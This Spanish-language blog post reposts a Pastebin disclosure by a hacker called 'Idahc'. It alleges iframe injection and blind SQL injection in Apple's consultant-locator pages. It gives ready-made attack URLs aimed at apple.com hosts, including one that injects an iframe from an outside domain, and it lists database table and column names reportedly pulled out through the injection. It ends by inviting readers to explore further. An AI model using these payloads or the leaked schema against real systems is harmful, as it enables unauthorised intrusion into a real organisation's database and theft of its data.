Apple.com, vulnerable a blind SQL e Iframe Injection

Un hacker libanés «Idahc» que asegura no pertenecer al grupo Anonymous o Lulzsec expuso unas vulnerabilidades pertenecientes a la manzana.

Iframe Injection
https://consultants.apple.com/au/locator_results.php?sl=%22%3E%3Ciframe%2520src%3dhttp%3a%2f%2fblog.puchunguis.com%3E

SQL Injection
http://consultants-locator.apple.com/companySearch.php?PHPSESSID=778153fc1a5a58ff32322a8fd24f0ff6&fuseaction=home.directory&offset=0&rppg=8&q=’&cf=hu&

DATABASE = APPLE
Table_name Apple :

address
application
application_company_relationship
application_geocoverage
application_option
applicaion_routing
attachment
auth_company_permission
auth_user_default_permission
auth_user_permission
catalog_category
catalog_discount
catalog_order
catalog_order_product
catalog_product
catalog_product_category
catalog_product_discount
catalog_product_mdf_campaign
catalog_product_mdf_fund
catalog_prodpcu_product
catalog_product_rating
class_field_input
company
comapny_address
addressID
alphabetID
label
street
city
state
postale
countryId
phone_number
phone_fax
latitude
longitude

Y quien sabe, si exploras quizás puedas encontrar algo más que la tabla de consultores.

Fuente: Pastebin

Leave a Reply

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.